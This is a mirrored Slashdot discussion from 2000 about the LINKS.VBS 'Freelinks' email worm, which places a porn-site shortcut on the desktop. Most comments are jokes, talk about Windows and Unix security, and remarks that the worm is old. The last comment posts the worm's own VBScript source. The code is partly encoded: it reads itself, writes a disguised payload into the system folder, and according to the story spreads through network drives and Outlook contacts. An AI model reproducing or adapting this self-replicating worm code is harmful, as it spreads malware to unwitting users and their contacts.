Slashdot Mirror


The Next Generation of ILOVEYOU: The Porn Worm

Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant - it's got a subject line of "Check this" and consists of a one-line message and an attachment named LINKS.VBS. Its only purpose other than self replication is to add a link to a XXX site to your desktop. The attachment is a self-replicating script that copies itself to all network drives and sends itself to everyone listed in outlook's address book. This variant is interesting since it's partially encrypted to obscure its purpose. It's nice enough to ask if you want the shortcut added to your desktop, but it doesn't ask about replicating itself. It's basically a trojan advertisement. Fortunately, it doesn't delete any files. Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable."

192 comments

  1. Re:I Like You by duckyd · · Score: 1

    I think everyone that's ever said the word unix got that...

  2. Great movie title! by d-man · · Score: 1

    I'd always wondered where pr0n producers come up with movie titles as original as "Sheepless in Montana" and "Shaving Ryan's Privates". Now I know -- they get them from /.! I can't wait for "Porn Worm: The Movie" to come to DVD.

    Does this bring a second meaning to "trojan advertising"?

    --
    Unix: Where /sbin/init is still Job 1.
  3. That's an OLD one... by MightyTribble · · Score: 1

    My bosses' machine had that virus about six weeks ago. It placed a link to a porn link exchange site, if I remember correctly.

    It was trivial to clean, AIRC. Nowhere near as nasty as ILUVU was.

    Sorry, Cmdr, but this doesn't sound like a new virus. Did you check out Symantec's library before posting, to see if it had any history?

  4. Re:Unix and Viruses. by PurpleBob · · Score: 2
    There's a log of one time this actually worked at http://www.theplunger.com/idiot/. The log is long, but quite funny. It probably helps to know what a MUSH/MUX is, but it's not necessary.

    A choice quote from the log: ('You' is the person giving the "help", and Oronde is the idiot)

    You say "Type 'ls' and tell me what you see."
    Oronde says "okay now what?"
    Oronde pages: nothing...
    You say "oops. I guess rm *is* the deleting files and 'del' isn't."
    You say "Wow. What a mistake *I* made! I must have not read the manual!"

    --
    No more e-mail address game - see my user info. Time for revenge.

    --
    Win dain a lotica, en vai tu ri silota
  5. Survival of the Species by BlatantKarmaWhore · · Score: 1

    Frankly, it's a bit disturbing to see all the abuse M$ users get. The general view seems to be that if you're running Windows you're a moron, because of all the blatant security holes. I'm not arguing that. Windows has more accessible holes than an hour long gay pr0no. And everybody knows about them. The reason everybody knows about them is that Windows is what the vast majority of people use. It's the standard for the market, and therefore it's subject to the most examination. But that's off topic. The reason that all these viruses are aimed at M$ is the law of the jungle. If you have a huge population of prey, the associated predators grow in population as well. When the majority of users run Windows, the haXOrs aim for Windows systems. A virus vs. Windows is international news. A virus vs. Linux or Macs or whatever, while it might be important to /. fans, is NOT international news. Not enough people are affected. Now please form an orderly line to flame me into oblivion.

  6. productive useful virus by jessica6 · · Score: 1

    I'm still waiting for the MS virus that will blow away Windows, ftp the latest version of RedHat and install it. This would happen off hours, of course. :)

  7. Re:Unix and Viruses. by DrTomorrow · · Score: 1
    If Linux (or any one version of Unix) had 80% market share and ran an Office suite with 80% market share, Linux would have a similar virus problem.

    Virus writers want them to spread. It doesn't take a brain surgeon to target 80% of the computers instead of 4%.

    --

    Everything in this post is false.

  8. damit by jbarnett · · Score: 2


    damit the commercial world gets all the cool tools, the sound blaster live drivers were out first on Windows, and most of the new 3D cards are supported under windows, not to mention the cool automatic shutdown "blue screen of death" that is smart enough to turn itself off and now this.

    Dammit, I would like porn on my desktop, please please tell me this works under wine...

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  9. Re:I thought this was old news... by z00t · · Score: 1

    Saw this months before ILOVEYOU. Is Slashdot getting lazy? With all their bread, maybe somebody could have taken 15 seconds to check any 1 of the major AV vendors' sites before posting this.

  10. Sorry, but this isn't a new virus by montjoy0 · · Score: 1

    We had this pass through my work over a month ago. But don't take my word for it, go to http://vil.nai.com/villib/dispVirus.asp?virus_k=10225 Looks like it's as old as last July.

  11. Links.vbs Virus is not new.. by cOdEgUru · · Score: 1

    Actually this particular virus was born and probably inspired the ILOVEYOU virus. This is again a script kiddie virus and was released around six months back and the firm in which I worked was affected. But the virus writer did something dumb... the virus sent itself three times to the same person on your Outlook Addressbook. Since three mails from the same person with the same attachment is fishy in nature, I never even looked at it. Later I dissected the code and saw it didn't do much other than copying itself to network drives and adding the link.

    My stupid Project Mgr opened it and he didn't even know that it left a link "XXXLinks" on his desktop until I showed him.

    This is nothing new, just some kid who thought the ILOVEYOU virus is getting all the attention that he deserves and decided to send his baby out again.

    Grow up!

  12. Why on earth would you install this? by CaptainSuperBoy · · Score: 1
    I looked on their web site to find out what this thing was.. why would anyone run this program? It puts an ad bar on your browser, it adds some crappy bookmarks to your browser.. it puts links on your e-mails.. it changes your home page to their page.. it pops up a new window every time you open a new URL!

    Not only that, they basically threaten that if you try to remove the software, it will put itself back when you reboot..

    Why on earth would you use this? I can't see any redeeming features.. I even went to their homepage and tried running a search. Half the links don't work, and the other half take you to random searches about casinos and stuff..

  13. Hrmph! by GoRK · · Score: 1

    My god, for the first time in history the virus warnings on slashdot are outnumbering the ones inept people are e-mailing me!

    ~GoRK

  14. Theoretically... by schon · · Score: 2

    Theoretically, I can see at least one good use of this stuff: remote administration.

    A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each user's machine to do the install..

    Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to use the system is who they say they are..

    All in all, it MIGHT have its uses, if it were implemented in a more secure manner.

    1. Re:Theoretically... by mpe · · Score: 1

      A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each user's machine to do the install..
      Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to use the system is who they say they are..


      More likely easier to use login scripts or remote administration programs. An obvious problem with using the email upgrade approach is that the email program itself is quite hefty and likely to be holding on to resources the installer wants to upgrade.

  15. Re:Alternative virii? by DeanT · · Score: 1
    I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.

    I believe that the UNIX guru in question is Ken Thompson. His article Reflections on Trusting Trust is quite interesting.

    Regards,
    DeanT

  16. DeCSS by Detroit · · Score: 1

    Try spreading decss with something like this. You could force-mirror any reasonable size files with this kind of trojan mechanism. 'Educational viruses'. There would be a disadvantage of brutally harsh pr for your cause by media and govt, but it might be balanced by the need for survival of the software or information.


    ... . . .

    --
    ... .. . . . http://group227.com
  17. Older than ILOVEYOU by BluesGeek · · Score: 1

    This virus is actually a little older than the ILOVEYOU virus and only shares the Outlook propagation technique. It is pretty cleverly written to encrypt / decrypt itself through multiple layers.

  18. Re:Make you want to... by seibed · · Score: 1

    re: alter the virus to make the porn site the default page for the browser, not just add a desktop link.

    I would think that if the virus worked, you would bring down the server incredibly quickly (as millions would automatically go to this site as soon as they got this virus)

  19. Re:Zero Originality by quonsar · · Score: 1

    As if everyone who sends unsolicited email is 'dumb as a post.'

    You're right. Some of them are actually dumb as a rock.

    ======
    "Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

  20. Re:Independent Confirmation by orangecat · · Score: 3
    Will the Symantec Antivirus Research Center entry do?

    Yes, it's true. Though it is far from a new thing - it's been around for about a year now.

  21. When will M$ Users Get it? by grubby · · Score: 1

    I swear how many viruses came out that have taken advantage of this .vbs prob? It has only taken M$ two years or so to fix the prob. Or at least that is what they "say". Until someone finds the next bug in outlook, or some key component of windows. How do companies and the government continually put up with being beaten by these? I guess somebody needs to tell them to get a clue. Anybody have any ideas how to make them understand that these problems are only on the micro$oft platforms? Someday if we are lucky they will get it.

  22. (-1, redundant) ! by Super_Frosty · · Score: 1

    That's the score that this article should get, on account of the fact that this has been discussed SEVERAL TIMES on /.!! I mean, if I name a worm after myself, will I get a story?

    Remember, there is nothing new to say here, except for some karma whoring.

    Have a nice day!

    --
    No comment at this time
  23. what's next? by grizzo · · Score: 1


    a link to porn on my desktop???

    why can't all viruses be this horrific...? next thing you know i'll be receiving the "FREECASH" email.
    too bad i'm not an outlook kid...

    --
    grizzo: totally insecure, but very convenient.
  24. Mattel Responds by laborit · · Score: 5

    So now Cyber Patrol will have to add the Windows Desktop to its blocked site list, right?

    THAT should teach Microsoft to integrate its browser with its OS...

    - Michael Cohn

    --

    -----
    Go ahead, blame me... I voted for Nader!
  25. Too bad... by albamuth · · Score: 1
    ...whomever made the virus didn't have it paste porn content to the victim's desktop.

    Er, I mean, good thing they didn't.

    --
    [pink beam of light]
  26. the most painful virus of them all.. by scooterboy13 · · Score: 1

    is the "I just want to be friends" virus. Ouch.

  27. Email Virii and Outlook by haginmat · · Score: 1

    One of the best ways to prevent the spread of little nasties like Love Bug and others is really simple. Set your mail reading to 'return to inbox' rather than have it open the next item. Regards haginmat

  28. New??? by Nezer · · Score: 1

    I got with this one many, many months ago!

    It's pretty neat to look at and I highly recommend anyone look at the source and pull it apart. You will have to check out the "encryption" algorithm (if it can be called that) to get the key.

    Of course, you can always do what I did and crack the old way, with pen and paper. ;)

  29. Re:LINKS.VBS? and Microsoft Outlook Security Patch by Cplus · · Score: 2

    I had the same thing happen to me with IRC. I didn't accept it because the person who was sending left a message in channel about the fact that they had some kind of weird virus. I didn't hear a thing about it after that.

    I tried out the security update on one of the workstations at work. I think it was the best thing that ever happened for the user. She became so frustrated with the lack of functionality that they switched over to Netscape mail. Last one..........thankfully. As for seeing an end to the "worm" viruses, it won't happen until everyone learns the lesson of this user. Only took her a year of constant chaos.

    --
    "Share your knowledge. It's a way to achieve immortality." -- Dalai Lama
  30. Re:Wrong by seibed · · Score: 1

    RE: Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!

    uh-oh, now the FBI is going to come looking for you the next time a virus comes out...

    I could see the headlines now, "Hacker 'mindstrm' was arrested in an early morning raid, FBI points to incriminating posts on Hacker discussion group 'Slashdot'"

    seibed

  31. I Like You by bricriu · · Score: 1

    Anyone out there get the "I Kinda Like you" virus for *nix? It's on the honor system: rm a few files you're not using and forward to your friends. Wish I'd thought of it :)

    --

    AHHHHHHH! I'm burning with goodness again!
    - Reakk, Sluggy Freelance

    1. Re:I Like You by mazur · · Score: 1
      Anyone out there get the "I Kinda Like you" virus for *nix? It's on the honor system: rm a few files you're not using and forward to your friends.

      Don't spread it around! Now I have to delete some more files and forward this to all my friends and nodding acquaintances again! You're giving me a bad name, you. I shall have to install a filter to make sure I never see you again. I'm quite honourable, I'll have you know. Only a handshake is needed to clinch a deal, and I won't back out of it. Invoking it to your benefit or my detriment is evil.

      Stefan.
      "If someone has no honour, how can you trust him?" "Grab him by the wallet?" "Good point."

      --
      The truth shall make you fret. (Ankh-Morpork Times motto)
    2. Re:I Like You by kz45 · · Score: 1

      this virus is Old. It's not a variant of the ILOVEU virus. The creator of the ILOVEU virus probably took some of the code. I've seen this one over a year ago (e-mail + many IRC networks).

  32. Sorry, that's an old one. by zinger · · Score: 1

    The Freelinks virus as it's called is an old virus. I saw it first about six months before the loveletter came out.

  33. Zero Originality by doogles · · Score: 1

    If you're going to write a virus to advertise your stupid porn website, at least have some originality and write a nice, new virus from scratch instead of stealing someone else's idea.

    1. Re:Zero Originality by delysid-x · · Score: 1

      And some of them know what they're doing and make $1000/day.

    2. Re:Zero Originality by Cody+Hatch · · Score: 1

      And some of them know what they're doing and make $1000/day.

      Yeah. $1000 a day...from people who are dumb as rocks!

    3. Re:Zero Originality by Cody+Hatch · · Score: 1

      Well, not from that school, anyhow. Still, I doubt anyone at MY school has made ANY viruses. The quality of the virus apart, at least the guy got an A for effort...

    4. Re:Zero Originality by Tarquin · · Score: 1

      Shouldn't that read... dumb er than rocks?

      --
      It's not the rambling I object to, so much as the mumbled incoherancies...
    5. Re:Zero Originality by Squeeze+Truck · · Score: 1

      If you're going to write a virus, it'd be best not to have a fixed target like a website that angry sysadmins and feds can use to start tracking you down.

      --

      "Reactionaries must be deprived of the right to voice their opinions; only the people have that right." - Mao

    6. Re:Zero Originality by Qic · · Score: 1

      I saw a news report somewhere online that said that the authors of ILOVEYOU were, in effect, the best and most talented at the school they were from. I damn near spewed a mouthful of pepsi out my nose when the sudden laugh came upon me. If these guys are the brightest, I guess that we don't have to worry too much about info terrorism from the Philippines.

    7. Re:Zero Originality by I+R+A+Aggie · · Score: 1
      If you're going to write a virus to advertise your stupid porn website, at least have some originality and write a nice, new virus from scratch instead of stealing someone else's idea.

      These are spammers you're talking about:

      1. Spammers are dumb as a post.
      2. Spammers lie.
      3. If in doubt, refer to 1. or 2.

      When is the last time you saw an original spam? 1996??

      James

  34. Re:Unix and Viruses. = DIFFERENCE by Koos · · Score: 1
    The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.
    The day everything happened with the ILOVEYOU virus, I tried to replicate the behaviour with mutt, a unix mail client. I made a simple shell script 'test.sh' which did 'echo test'. When sending it with mutt, it was given mime-type application/x-sh. So at sending time, a shell script is recognized as such and given the correct type. When I received it, mutt gave the message '[-- application/x-sh is unsupported (use 'v' to view this part) --]'.

    I can set up mutt to execute application/x-sh scripts as shell scripts. But the big difference is that I have to set it up to be dangerous before that happens! The mentality in (most) Unix programs is nowadays security first.

  35. PICS labels :) by paulschreiber · · Score: 1

    I wonder if MS users can see the site if they've turned on IE's PICS support...

  36. Old news. by Tamriel · · Score: 1

    Have any of you ever been on IRC?
    links.vbs is very, very old news (talking at least a year), to anyone who's ever been in a channel with mIRC weenies (I used to op in a huge MP3 and a huge MPEG channel, so I knew all about it very quickly ;).
    Gawd, if you're going to release news of every old skript k1dd13 .vbs "virus", you'd need a few terabytes just to handle the HTML involved.

    d


    --
    I rather like cows.
  37. Independent Confirmation by smutt · · Score: 1

    This is some pretty funny stuff. Does Slashdot
    have any independent confirmation that the person who submitted this didn't just make it up??

    --
    The Information Revolution will be fought on the command line.
    1. Re:Independent Confirmation by Bad+Dude · · Score: 1

      I don't know about Slashdot, but I saw this one about 6-9 months ago.... This is not new news...

    2. Re:Independent Confirmation by SoftwareJanitor · · Score: 2

      Given how easy this would be to implement by modifying the ILOVEYOU virus, even if it started as a hoax, how long would it be before someone, given the suggestion, implemented it?

      Reality imitates fiction imitates reality.

  38. Re:Unix and Viruses. = DIFFERENCE by Submarine · · Score: 1

    The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.

  39. What's next.... by glitch_ · · Score: 2

    I'm going to write a worm that finds everybody that is transferring copyrighted material, then I'm going to sue them...oh wait, nevermind.

    1. Re:What's next.... by rgmoore · · Score: 1
      I have actually received spam with a "copyright" notice on the bottom stating that replying, forwarding, redirecting, reposting, etc., anything from the message would constitute a violation and would be prosecuted.

      You mean that you actually read your spam for longer than it took to decide to hit the delete key? What's wrong with you?

      Actually, this sounds like the basis for a moderately amusing scheme. You copyright a message and then spam it to millions of people with the section mentioning that it's copyrighted and all reproduction is forbidden. When they forward your message to abuse@your.isp.com, you sue them for copyright infringement. The only problem is that a halfway intelligent defense lawyer would be able to argue that forwarding the message to the abuse authorities is fair use. So much for that plan.

      --

      There's no point in questioning authority if you aren't going to listen to the answers.

    2. Re:What's next.... by Hominy+Chef · · Score: 1
      I've got a better idea... Write a worm/virus, copyright it, and sue everyone that passes it around. Make Money Fast! The only thing you have to worry about is hordes of angry Windows users and their lawyers.

      Oh, wait... the Napster/Metallica conspiracy has already done this...

      --
      Revenge is a dish best served cold -- grits should be served hot!
    3. Re:What's next.... by Tarquin · · Score: 1
      Have you ever noticed that internet time and dog years are the same?

      So... if my dog... writes... internet software... <g>

      Optional ending:... then... he's a witch!! Burn 'im!! Burn 'im!!

      --
      It's not the rambling I object to, so much as the mumbled incoherancies...
    4. Re:What's next.... by ZikZak · · Score: 1

      I have actually received spam with a "copyright" notice on the bottom stating that replying, forwarding, redirecting, reposting, etc., anything from the message would constitute a violation and would be prosecuted. Yes, they were serious. I promptly forwarded it (just the copyright portion. no need to spread the spam) to several people.

  40. another one!?!?! by gee308 · · Score: 1

    There seems to be a lot of viruses coming out these days. How immune are the Linux/Unix systems and what can we do to prevent these kind of viruses from causing us trouble? How would the current viruses need to be configured to bother us? Starcraft Linux, IPMASQ, Gnutella

  41. WORM.Slashdot by Jage · · Score: 1
    WORM.Slashdot

    WORM.Slashdot is a worm that will work under most nerdy minds. Once the worm is launched, it uses person involved to waste valuable working time on daily basis reading Slashdot. It can also use a number of ways to propagate: other web pages, by word of mouth, IRC and email by masquerading as something interesting.

    Also known as: /.bomb

    Category: WORM

    Infection length: 100-400 posts, 1-100 slashdot.org loads per day

    Virus definitions: May 23th, 2000

    Threat assessment:

    Damage: HIGH - Distribution: HIGH - Wild: HIGH

    Wild

    • Number of infections: More than 1000000
    • Number of sites: 1 (slashdot.org)
    • Geographic distribution: HIGH
    • Threat containment: HIGH
    • Removal: HIGH

    Damage

    • Payload
      • Large scale loading of web pages: mostly slashdot.org
      • Slashdot effect: More dangerous side effect when slashdot.org links to some external page
      • Lost sanity: Might make you write posts on subjects like "First Post!", "Beowulf cluster" and "Natalie Portman". That happens mostly only before total system breakdown.
      • Modified files: /dev/brain

    Distribution

    • Word of mouth: Check this
    • Target of infection: Nerds

    Technical description

    Similar to the freshmeat virus, this worm uses nerd() calls to make users reading slashdot.org (and wasting valuable working time). The contents of worm is "Slashdot.org News for Nerds: Stuff that matters".

    Removal:

    • Destroy all modems, network cards and other devices capable with TCP-IP networking.

    Write-up by: Jage May 23th, 2000

    This is funny. Laugh now.

  42. Re:Suggestions for improvement by snubber1 · · Score: 1

    My solution for when that gets out of hand (or when netscape just hangs) is to click the little stick of dynamite on my toolbar that executes one command...
    "killall -9 netscape"

    ----------------------------------------------

    --
    I don't really mind double posts on //..
  43. Where can I get it? by dodeldo · · Score: 1

    I want that link! Always looking for fine pr0n.

  44. if you're still getting it... by banky · · Score: 1

    ... then you know a lot of people that aren't computer savvy, or are just plain stupid.

    The news has been out there. Pundits are talking about everything. MS, the AV shops, and every admin worth his salt is taking steps to stop it.

    In other words, unless it defeats all known AV and sensible security precautions (ie, disable most of Outlook's functionality) then I say, let's drop the issue.

    --
    ZOMG I WOULD LOVE TO KNOW ABOUT YOUR FEELINGS ON MACINTOSH VERSUS WINDOWS, VI VERSUS EMACS, AND HOW YOU'RE NOT A DORK
  45. Old News... by rider · · Score: 1

    This virus has been out since July 1999 according to NAI. Check out http://vil.nai.com/villib/dispvirus.asp?virus_k=10225
    for the info. Seems like this would be more of a cousin to Melissa rather than ILOVEYOU.

  46. Vulnerable? As long as it isn't a pay site, lucky! by The+Evil+Beaver · · Score: 1

    "Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable."
    I don't think so. Well, if it's free porn, vulnerable is the wrong word. If it's a free site, then Outlook users like myself are lucky to catch this one. Gimme gimme! (=


    When the pack animals stampede, it's time to soak the ground with blood to save the world. We fight, we die, we break our cursed bonds.

    --
    Chris 'coldacid' Charabaruk Meldstar Entertainment
  47. Re:trojans by Anonymous Coward · · Score: 2

    Only the condom commercials.

  48. Not new by Mojojojo+Monkey+Inc. · · Score: 1

    Worms with the name Links.vbs have been floating around IRC for several months now, this looks like someone just decided to create an email variation, it used to just send via DCC.

  49. In fact by NetJunkie · · Score: 1

    According to Symantec it was found last July.

  50. Re:This is a bug? by Platinum+Dragon · · Score: 2

    Wow, a free app that adds a shortcut to a porn site on my desktop and generously tells all my friends coworkers. That's not a bug!

    Of course not. It's a feature.

    --

    Someday, you're going to die. Get over it.
  51. Marketing value in viruses? by ivan37 · · Score: 1

    Finally someone realized the marketing value of viruses! Heck, all it would take is a few good programmers for a large company like oh, Microsoft, to plaster obscure ads like this all over your computer. Or, hey, what about setting your computer to DDoS a set of Linux websites? Keep it under the wraps, and they could be having problems for weeks, not to mention losing a lot of money, etc! Or how about changing your hosts file so that whenever you go to slashdot.org, you actually go to microsoft.com/whylinuxisbad. Hey...have you ever thought that this is what is happening? It's Microsoft that makes all the bugs in Outlook, so they could easily use the bugs to make these kinds of viruses! It was Microsoft who made the Love Bug! Then they bought some stock in a porn site and made this new virus! Those Bastards!

  52. There's more coming... by mashx · · Score: 1

    After the worldwide strike of the "I LOVE YOU VIRUS", reports are already coming in that the virus is mutating into several variants.

    Within the next few hours, expect to see:

    The original "I love you" virus

    The "I like you a lot" virus

    The "You're nice, but I just want to be friends" virus

    The "It's not you, it's me" virus

    The "Look, it was just a date...don't get clingy" virus

    The "Okay, I think it's best if we don't have anymore contact" virus

    The "It was late, I was drunk, you were easy" virus

    The "Stop calling me, you unfeeling prick" virus

    The "That's it, I hate you and your stupid cat" virus

    Plus:

    The "No, I Reeaallllyyyy Like You" Virus ... usually hits around midnight

    The "You're Beawfullll ....." virus .... usually hits about 2am

    The "Nothing has to happen. I just want to wake up with you in my arms" virus ..... careful, it's a sly one.

    The "You're OK but I was wondering if your friend is single" virus

    The "Of course I'll phone you ... Now do you want me to call a cab for you?"

    .......... hmmm, that'll hit anytime between 3am & noon.

    Yet to have caffeine, seemed funny at the time...

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~

    --

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~
  53. Re:Unix and Viruses. by mpe · · Score: 1

    If Linux (or any one version of Unix) had 80% market share and ran an Office suite with 80% market share, Linux would have a similar virus problem

    Only if this "Office suite" had the same poor design as MS Outlook.
    The claims that "It only happens because Windows is popular" are a subtle form of FUD. Anyway as someone has already pointed out, Where are all the apache affecting viruses?
    Probably the primary reason that virus writers target Windows is that it is easy to write viruses for and those viruses can do all sorts of things.

  54. new type of spam??? by DaRkJaGuaR · · Score: 1

    ye gods if it isn't enough to have your inbox full of spam, now u can get your desktop/anything else about your computer changed by spammers grrrrr lets hope that this doesn't become a trend..

  55. Re:Make you want to... by sconeu · · Score: 1
    Maybe if Bill gets his default page set to "Naughty Barnyard Nyphos" a few times he will pay more attention to security.


    What's a "Nypho"?

    --
    General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
  56. Re:Make you want to... by passion · · Score: 1

    I first read this to be:

    Maybe if Bill gets his default page set to "Naughty Barney Nymphos"....

    If only :)

    --
    - passion
  57. Re:NOT NEWS ANYMORE! by mpe · · Score: 1

    Ok, this is NOT news. News will be that MS has developed some fab means of having scripting that is not a big gaping security hole.. (or news of any real innovation from MS for that matter)

    Microsoft's innovation is to be egocentric. First we had "My Computer" and "My Documents", now we have "Windows ME"
    Just about everything Microsoft have done in the last several users is a "rip off" of other people's ideas.

  58. Re:Two things... by mpe · · Score: 1

    Are there any LEGITIMATE uses for sending vbs scripts as email attachments (especially auto-run attachments) that I don't know about? I mean, obviously if you're part of a group of coders working on a vbs dev project you might want to exchange snippets but is there any reason for the average person to even expect a vb script in his/her email?

    Maybe the question should be "Are there any legitimate situations outside environments where the sysadmin can explicitly enable this. If and when it is needed." i.e. is there any legitimate reason for this being on by default?

  59. Not a variant of iloveyou but an older case by Mashiara · · Score: 1

    As someone already mentioned this is not a variant of the ILOVEYOU case but an older worm called Freelinks, see http://www.F-Secure.com/v-descs/freelink.htm for analysis.

  60. Re:Unix and Viruses. = DIFFERENCE by mcjulio · · Score: 1

    Just to clear up a prevalent rumor:

    The arbitrary code was not embedded in the message (any more than any other MIME-encoded attachment is embedded), and it was not executed by the email client. It required the user to double-click on it to execute it, exactly like any other executable attachment. The security hole is in the scripting model (Windows Scripting Host) that provides an automated interface to the global address book.

  61. In a Perfect World by WillAffleck · · Score: 1

    In a perfect world, the virus would create a windows link called "Windows 2000 Bug Fix" which had a link to download and install one of the Linux or BSD distros.

    --
    Will in Seattle
  62. Apples and Oranges by JayBonci · · Score: 1

    Okay, there are a lot of things flying around here.. first off, linux and windows... well read the subject. Most people think windows 95/98, a non-protected "do what you want, it's your machine and you're the only one on it OS". We are talking about two TOTALLY different things here. Now if you want to talk windows NT and linux, sure go for it. Effective system administration could stop any such virus. You could re-register .vbs files to a scripted something saying that you are about to execute a .vbs file and if you don't know what you are doing executing it, then press NO, or something. Simple enough. UNIX is too inconsistent to be hit by a virus as such... remember, VB is the tool of choice for NT, as perl or python or /bin/sh is for UNIXy OS's. There could easily be something that WELL hid itself in shell code and modified it, or faked the viewing aspect, or something. Unix is generally more well explored by its users, however there are plenty of times where there are files where even an experienced user does not mess with.. how many people mess with their .netscape stuff? My point is, UNIX users of the world, count your blessings.... there are many threats out there to security, that even open source is not going to stop... for every crafty person waiting to write a malicious vbs script, there is going to be a crafty perl nutcase waiting to fdisk a few drives. System administration solves many security woes. With a heads up, a good exchange admin can stop this kind of attack, and still gain the benefit of using that particular mail product. Linux looks great because windows (98) looks bad. That's the way it is. There are people that swear by both. The ILOVEYOU virus sucked. It hurt a lot of companies, businesses and government agencies.. A few friends of mine got it.. however, not running as administrator on their own machines led to a little file cleanup afterwards.. end of story.

    System administration is the magic bullet..keep your users under your watchful eye. There will always be something to sneak up on them. Keep in mind what you are comparing when you say "UNIX is safe...", or "UNIX will never have this kinda trouble"... linux should be grateful to shine in the bad press. it's about the technology, not the name --jay

  63. LINKS.VBS by Anonymous Coward · · Score: 1

    On Error Resume Next
    Set A1 = CreateObject("Scripting.FileSystemObject")
    Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1)
    Do While A2.AtEndOfStream = False And Mid(A3,40,10) "`sd]Lhbsnr"
    A3 = A2.ReadLine
    Loop
    A2.Close
    Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder (1),B("STOEMM/WCR")),True)
    A4.WriteLine(B("No!Dssns!Sdrtld!Odyu"))
    A4.WriteLine(B("Rdu!@0!O\J>@KFQB_Pliwt^ub_Jf`ulp liw_T fqgltp_@ruubqwYbupflq_Urq_Urqgoo""""+*C3,@wkjbNcrf &C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP """"++""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv&@&""" "Wkfp tfoo ^gg ^ pkluw`rw wl iubb [[[ ofqhp lq vlru gbphwls1 Gl vlr t^qw wl `lqwfqrbssof`^wflq""""++""( ("))
    A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C33!?!C3.,I grLcogUnceg&@&""""J>SF""""++""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dqp!Gcef!C30!Kl !C33,CbbpguuJkuru""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C35!?!C3.,E pgcrgKrgo&.+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C32!?!3!Rq! C30,CbbpguuGlrpkgu,Eqwlr""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C37!?!C30,C bbpguuGlrpkgu&C32+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Kd!C32!?!3!Rfgl ""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C37,C bbpguu""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Gjug""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C35,@ EE!$!@&""""8 """"+!$!C37,Cbbpguu""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,Uw`hger!?!@ &""""@kb`h wkfp""""+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,@qb{!?!@&"" ""K^yb irq tfwk wkbpb ofqhp1""""+!$!Efp&35+!$!Efp&3.+!$!@&""""Evb1""""+" "(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,Crrcefoglru ,Cbb!YUepknr,UepknrDwjjLcog""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,BgjgrgCdrgp Uw`okr!?!Rpwg""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,Uglb""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dwlerkql!@&@3+" "(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dqp!@0!?!3!Rq!J gl&@3+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@ 0*3++!:(""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?3""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""Gtglr3?QL!HQKL8 %81bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/Fd uRqdbh`mGnmeds)1(-C)""JKLMU,T@U""((("))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?3""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]3../Jgtgj!3.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]0../Jgtgj!0.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]5../Jgtgj!5.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]2../Jgtgj!2.._ ""(("))
